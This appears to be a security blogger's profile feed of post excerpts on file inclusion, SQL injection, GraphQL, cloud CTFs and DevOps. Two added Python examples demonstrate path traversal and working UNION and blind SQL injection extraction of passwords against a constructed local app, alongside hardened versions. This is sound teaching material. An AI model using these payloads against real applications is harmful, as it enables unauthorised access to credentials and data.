XeusNguyen

@XeusNguyen

Stay humble and enthusiastic with passion. Follow me more on: https://wiki.xeusnguyen.xyz

Joined on Aug 28, 2022

  • What is file inclusion? In some scenarios a web application is written to fetch files on the server, such as images or static text, via parameters. Parameters are query strings attached to the URL that carry user input and are used to retrieve data or perform actions. The diagram below breaks down the essential parts of a URL. Google search is a familiar example: the GET request https://www.google.com/search?q=TryHackMe passes the user's input to the search engine in the q parameter. For file inclusion, consider a user requesting a file from the web server. The user sends an HTTP request that names the file to display; if they want to view their CV inside the application, the request may look like http://webapp.thm/get.php?file=userCV.pdf, where file is the parameter and userCV.pdf is the requested file. Why do file inclusion vulnerabilities happen? They are found in web applications written in many languages, PHP being the classic case, when the application is poorly written and implemented. The core issue is input validation: the user controls the value of the parameter, and it is passed into the function that loads the file without being sanitised or validated. Because nothing restricts the input, the user can name any file the server process can read, including files outside the intended directory, and that is the vulnerability.
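The post's example is a PHP handler that hands the raw file parameter to an include or read; the same defect and its fix are shown here in Python so the example runs offline. This is an added example, not code from the post: the directory layout, the file contents, the allowed-extension list and the function names are all constructed for the demo, and the web framework is left out so each handler is just a function taking the parameter value.

```python
"""Vulnerable vs hardened file serving for a get.php?file=... style handler.

Added example, not from the post.  setup_demo() builds a constructed tree:
a public directory holding userCV.pdf and, one level above it, a secret
file that must never be served.
"""
import os
import tempfile

# Assumption about what the handler is meant to serve: only these types.
ALLOWED_EXTENSIONS = {".pdf", ".txt", ".png"}


def setup_demo():
    """Create the constructed directory tree; returns (public_dir, secret_path)."""
    root = tempfile.mkdtemp(prefix="fi-demo-")
    public = os.path.join(root, "public")
    os.makedirs(public)
    with open(os.path.join(public, "userCV.pdf"), "w") as f:
        f.write("%PDF-1.4 fake CV")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("DB_PASSWORD=hunter2")
    return public, secret


def serve_vulnerable(base_dir, file_param):
    """The unvalidated include: the parameter is joined straight onto the
    base directory.  '../secret.txt' walks out of base_dir, and an absolute
    path makes os.path.join discard base_dir entirely."""
    path = os.path.join(base_dir, file_param)
    with open(path) as f:
        return f.read()


def serve_hardened(base_dir, file_param):
    """Resolve the final path (symlinks and '..' included) and refuse
    anything that lands outside base_dir, has an unexpected extension, or
    is not a regular file.  Returns None on rejection."""
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, file_param))
    try:
        inside = os.path.commonpath([base_real, target]) == base_real
    except ValueError:  # e.g. different drives on Windows
        inside = False
    if not inside:
        return None
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    if not os.path.isfile(target):
        return None
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    public, secret = setup_demo()
    print(serve_vulnerable(public, "../secret.txt"))   # leaks the secret
    print(serve_vulnerable(public, secret))            # absolute path leaks too
    print(serve_hardened(public, "../secret.txt"))     # None
    print(serve_hardened(public, "userCV.pdf"))        # the CV
```

The containment check is done on the resolved path, not on the raw string, so encodings, repeated `../` and symlinks inside the public directory are all handled by the same comparison; stripping `../` from the input would not be equivalent.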
  • (Vietnamese) Application security during software development. This is a stage that needs many resources and several different approaches, applied throughout the software development life cycle (SDLC). Image by Topdev. Going by the image, there are three operating stages of a product, each paired with a corresponding testing product: SAST (static application security testing): used in white-box testing projects. Needs no compilation, so it can be the first component deployed. Example: SonarQube. DAST (dynamic application security testing): used in black-box testing projects. The application is run first and then tested, for example by checking requests and finding server misconfiguration errors. Example: ZAP. IAST (interactive application security testing): used in grey-box projects (white-box plus black-box). Configured inside the test runtime environment. Example: Contrast Security. RASP (roughly comparable to IDS and IPS): deployed on the server to protect it in real time. Examples: Sqreen, ModSecurity (Nginx); note that ModSecurity is strictly a web application firewall in front of the app rather than an in-process RASP.
  • Monitoring and observability for the system. Note: for monitoring and observability of a Kubernetes cluster you have many options today, such as Grafana, Prometheus, Loki and Tempo.
  • Yo, hello hello @everyone. It's been a good week to bring back Hackweekend. Continuing on, today we will learn and solve the Wiz.io CTF on cloud security; today's target is IAM. Let's digest :smiling_face_with_smiling_eyes_and_hand_covering_mouth: Challenge link: BigIAMChallenge. Challenge 1: Buckets of Fun. Description: We all know that public buckets are risky. But can you find the flag?
  • Hi @all, it's been a week and as usual the Hackweekend session is back with a new topic. Today we continue with cloud security, but more on the red-team side, with some very cool technical challenges hosted by Wiz.io. Let's digest :thumbsup: Link to challenge: https://k8slanparty.com/ Challenge 1: Recon - DNSing with the stars. Description: You have shell access to a compromised Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.
  • Hi there @everyone. Continuing my mood for writing blogs, I'll release something to help you define alerts on Grafana using only Terraform, and manage them that way :smile:. So let's find out how. What you're looking for: Grafana is a tool used only for observation and monitoring, like a visualiser. It only works if a data source provider exists (e.g. Prometheus with metrics exporters). It contains multiple dashboards through the web UI for monitoring. To act quickly with Grafana you need to consider alerting, because it can notify you in real time. Perfect :small_airplane: Grafana has it. Behind the scenes of alerting.
  • Resources: QR Codes Exploitation: How to Mitigate the Risk?; Create Malicious QR Codes to Hack Phones & Other Scanners; Think before you scan: How fraudsters can exploit QR codes to steal money; QRLJacking. So what technology grew during the COVID-19 pandemic and became a popular method during that terrible time? The QR code :thinking_face: So I have a couple of questions about QR codes, like:
  • Hello BTB again. In this session I'll go over everything I know about k8s from my internship. It will cost you some time, and I think it won't be complete and will have errors, but I'll do my best. Let's implement --> :small_airplane: && :balloon: Overview: this session has a whole bunch of things to talk about. Let's go with: Networking: this part is about how we point a public IP at pods inside the cluster, and how to set things up to do that job.
  • Description: Damning internal communications within Maple Bacon have been leaked, revealing a plot to steal the flags of other teams at the upcoming International Flag Admirers' Conference. You've gotten a hold of the leaked files. Find information that could help uncover the identity of the whistleblower. Attachment: access link to get the image. Searching the internal image. First, we look at the black-out covering the letter, so I think it may be, or should be, the hidden target we want to exploit, so I tried every method to erase it, but I didn't get anything from that. Second, I thought about what happens if I change the colours. Any tool can be used, like Stegsolve, Photoshop or just an online tool like Aperi'Solve; all of them let you change the colour parameters of the image, and yeah, let's see how to find anything else. Third, I didn't know what the description meant, and at the time of solving this chall I didn't think about ciphers or any other technique, but I was wrong: a cipher is the key to solving this chall. So "uncover", huh? Maybe it's just a trap LOL :smiley:. --> So that's all I want to tell you about the image; I'm not sure there is anything else we can exploit, so just let me know :innocent:
  • (Vietnamese) Introduction and presentation of the method. Problem statement: study AWS Cloud and build a program to analyse and monitor security weaknesses from the outside. Study the Linux operating system: Ubuntu was chosen as the VPS environment to host the website. Study the AWS environment ==> The team built a concrete website, Juice-Shop (OWASP Top 10), a large site for learning pentesting. VPC: the default VPC and network provided by AWS were used. The rules and ports opened for the system are contained in the security group and routing table: the full range 0.0.0.0/0 is opened for all external traffic into the system on port 80, and specific IPs are configured for SSH access on port 22 from outside. No load balancer yet: since hosting runs on a single EC2 instance, a load balancer is not yet necessary. The project was built with Docker ==> A container image for Juice-Shop already exists as open source, so the system was deployed from it. Link: Docker image. On Discord and Telegram: these are two very popular platforms. Here the team plans to build a bot that receives notifications or launches vulnerability scans through an API server we build; this is presented in detail below.
  • Definition: The Open Web Application Security Project (OWASP) is a nonprofit foundation dedicated to improving software security. It operates under an "open community" model, which means that anyone can participate in and contribute to OWASP-related online chats, projects, and more. For everything from online tools and videos to forums and events, OWASP ensures that its offerings remain free and easily accessible through its website. The OWASP Top 10 provides rankings of, and remediation guidance for, the ten most critical web application security risks. Risks are ranked according to the frequency of discovered security defects, the severity of the uncovered vulnerabilities, and the magnitude of their potential impact. The purpose of the report is to give developers and web application security professionals insight into the most prevalent security risks so that they can fold its findings and recommendations into their own security practices, thereby minimising the presence of known risks in their applications. Following TryHackMe, we go through the ten categories in the list below: Injection
  • This is the first blog I've written on a topic outside security, and it's the part I like most: bringing new technology into my room. So in this session I'll talk about my adventure building a NAS. I hope you can set one up yourself and have a good time learning something new about networking :coffee: References for this topic: https://www.youtube.com/watch?v=gyMpI8csWis&t=968s&ab_channel=NetworkChuck https://www.raspberrypi.com/tutorials/nas-box-raspberry-pi-tutorial/ What is a NAS? Network-attached storage (NAS) lets you save files from your computers and mobile devices to external hard drives over your home or office network. Using a Raspberry Pi, you can connect your existing storage devices, such as external portable hard drives and USB flash drives, to create secure backups of all your important files, accessible from anywhere in the world. SAN and NAS differ in architecture; the diagram below shows the distinction.
  • In the mood for sharing, this is the second blog I'm posting today; also come and read Setup MySQL with Wordpress in k8s: Easy migrate or not !!. If you want to know how to set up Linux and Windows VMs as Azure Pipelines agents, check it out down below. What are you looking for? Azure Pipelines is one of the best things in Azure; I confess it's pretty super cool compared to alternatives like GitLab CI/CD and GitHub Actions. Why is it good? Templates for whatever you want are why I like it: they save time when customising a new pipeline script without affecting another one. But to do this more securely, with more time and more customisation, Azure users prefer self-hosted agents over the Microsoft-hosted VMs for running CI/CD pipelines. The scenario for setting up the agent: a Linux or Windows VM is registered with Azure Pipelines via a token. It will hold the environment for working with Azure resources, such as creating VMs or interacting with a K8s cluster, so it needs a role for that, or an Azure AD application role, to access anything via that IAM.
  • Azure: set up MySQL Flexible Server. 1. Configure slow query logs: enable the required settings under Server parameters (that is where the configuration lives). 2. Set up diagnostics (note).
  • Hi @all, welcome to my blog. Today I'll talk about cloud, and specifically cloud security. With growth and scaling out, cloud computing is becoming the first option people turn to for operating their systems, orchestrating them or securing their infrastructure; that's the big question behind all of it. So, by way of some cloud-security contests, I'll cover a platform released a month ago about AWS and Kubernetes cloud security in the form of a CTF. It's called EKS Cluster Games. Link for participants: https://eksclustergames.com/ "A huge thanks to the Wiz team for making a great challenge for the community and bringing more experience to us." Some prerequisites: it's a game played in the terminal, so you need to be comfortable with that, because you'll be typing, not clicking :sob:
  • Hi, welcome back to my Hackweekend series. I'm glad and grateful that you've reached here. Good luck, and I hope you find what you're looking for. The definitions and exploitation details are based on PortSwigger's GraphQL and GraphQL API security material; go check that out if you want to explore GraphQL. In this blog I just give a brief that combines the information you need in order to work with GraphQL and exploit it. GraphQL: finding the way to reach the goal quickly. 1. Definition of GraphQL and why this technology was released. GraphQL is an API query language designed to facilitate efficient communication between clients and servers. It lets the client specify exactly what data it wants in the response, helping to avoid the large response objects and multiple calls that can sometimes be seen with REST APIs. @XeusNguyen :thinking_face: "GraphQL was released as an alternative technology to REST APIs, but it can't replace REST. GraphQL helps you optimise queries and get exactly the data you have in mind, but I think that's about it; in some specific cases you will need REST instead of GraphQL, and vice versa. The balance between them gives you multiple options when choosing the right technology."
  • (Vietnamese) (TL;DR) Thanks to Louis Cremen (@proxyblue) for the information that made this article possible. An overview of information security, the structure of a security team and DevSecOps culture in the enterprise. What is information security? Information security is the act of preventing and guarding against the unauthorised use, access, disclosure, sharing, distribution, recording or destruction of information. Today information security is seen as one of society's top concerns, with a large influence on almost every field of natural science, engineering, social science and economics. Information security is becoming ever more important; protecting data, and protecting yourself, in cyberspace is more essential than ever. We should protect ourselves, unless we want our pictures to end up somewhere online one day without us knowing --> a very terrifying accident :scream:
  • Hello, long time no see. I'm just back after a break, struggling with issues in implementation and provisioning, and I've just finished the flat of the capstone project for the scaling project. So I'm writing a blog to pass on the experience and take a break after the issues I ran into over the last week. Terrible and stressful. Whether it's hard or not maybe depends on your mindset, LOL; look below for some mistakes I made during the provisioning process :smiley:. Avoid them and don't struggle with the same mistakes as me :face_with_finger_covering_closed_lips: The mindset of the project: migrate on-prem WordPress to WordPress on k8s. This is not too hard, but it will confuse you when setting up the other tools in k8s. WordPress always has a legacy database, MySQL, integrated with it, so we need to move not only WordPress but also MySQL and the data inside it to k8s. Step by step through the migration and why I struggled with it: set up WordPress and MySQL on k8s.
  • What is blind SQL injection? Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors. With blind SQL injection vulnerabilities, many techniques, such as UNION attacks, are not effective because they rely on seeing the results of the injected query within the application's responses. It is still possible to exploit blind SQL injection to access unauthorised data, but different techniques must be used. Exploiting blind SQL injection by triggering conditional responses: consider an application that uses tracking cookies to gather analytics about usage. Requests to the application include a cookie header like this: Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
  • UNION query lab. SQL injection UNION attacks: when an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in an SQL injection UNION attack. The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example: SELECT a, b FROM table1 UNION SELECT c, d FROM table2 This SQL query returns a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2. For a UNION query to work, each SELECT must return the same number of columns and the data types in each column must be compatible, so an attack starts by finding out how many columns the original query returns.
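Both SQL injection posts above (UNION retrieval, and blind extraction through the TrackingId cookie's conditional "Welcome back" response) can be exercised against one small app, so one added example serves both. This is not code from the posts or from PortSwigger's labs: the schema, product rows, passwords and the cookie value are constructed for the demo, and the app is an in-memory SQLite database with two handlers that build SQL by string formatting, which is exactly the defect the posts describe. The attacker functions only see what a browser would: the product rows, an error page, or whether the tracking page contains "Welcome back".

```python
"""UNION and blind (boolean) SQL injection against a tiny SQLite app.

Added example, not from the posts.  Schema, rows and cookie value are
constructed; the handlers are deliberately vulnerable (string formatting).
"""
import sqlite3

KNOWN_COOKIE = "u5YD3PapBcR4lN3e7Tj4"   # a valid TrackingId, as in the post


def build_app_db():
    """Constructed schema: the catalogue the page shows, the users table
    the attacker wants, and the tracking cookies the app recognises."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, price REAL, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE tracking (id TEXT);
        INSERT INTO products VALUES ('Mug', 5.0, 'Gifts'), ('Pen', 1.5, 'Gifts');
        INSERT INTO users VALUES ('administrator', 'S3cr3t!pw'), ('wiener', 'peter');
        INSERT INTO tracking VALUES ('u5YD3PapBcR4lN3e7Tj4');
    """)
    return db


# ---- vulnerable application side ----

def product_page(db, category):
    """Rows rendered on the product page.  A SQL error propagates, which
    the attacker sees as an error page (used to count columns)."""
    sql = "SELECT name, price FROM products WHERE category = '%s'" % category
    return db.execute(sql).fetchall()


def product_page_safe(db, category):
    """Same page with a parameterised query: the payload is only a string."""
    return db.execute("SELECT name, price FROM products WHERE category = ?",
                      (category,)).fetchall()


def tracking_page_welcomes(db, tracking_id):
    """True iff the response would contain 'Welcome back' (cookie matched).
    No results or errors are shown: this is the blind case."""
    sql = "SELECT 1 FROM tracking WHERE id = '%s'" % tracking_id
    return db.execute(sql).fetchone() is not None


# ---- attacker side ----

def find_column_count(db, max_cols=10):
    """Append UNION SELECT NULL[,NULL...] until the page stops erroring;
    the first count that works is the column count of the original query."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            product_page(db, "Gifts' UNION SELECT %s--" % nulls)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_dump_users(db):
    """With the column count known, append the users table to the listing
    and keep only the rows that were not on the legitimate page."""
    if find_column_count(db) != 2:
        raise RuntimeError("unexpected column count for this demo schema")
    legit = set(product_page(db, "Gifts"))
    rows = product_page(db, "Gifts' UNION SELECT username, password FROM users--")
    return {user: pw for user, pw in rows if (user, pw) not in legit}


def blind_extract_password(db, username):
    """Boolean-based extraction: each probe is the valid cookie plus an
    injected condition, so 'Welcome back' appears iff the condition holds.
    Find the length first, then each character by binary search on its
    code point (assumed printable ASCII)."""
    subq = "(SELECT %%s FROM users WHERE username = '%s')" % username

    def oracle(condition):
        return tracking_page_welcomes(db, "%s' AND %s--" % (KNOWN_COOKIE, condition))

    length = 0
    while oracle("%s > %d" % (subq % "length(password)", length)):
        length += 1

    chars = []
    for i in range(1, length + 1):
        expr = subq % ("unicode(substr(password, %d, 1))" % i)
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("%s > %d" % (expr, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    db = build_app_db()
    print("columns:", find_column_count(db))
    print("union dump:", union_dump_users(db))
    print("blind:", blind_extract_password(db, "administrator"))
```

The binary search costs about seven requests per character instead of one per candidate character, which is why real tooling prefers it; `product_page_safe` shows the fix, since with a bound parameter the same UNION payload is just a category name that matches nothing.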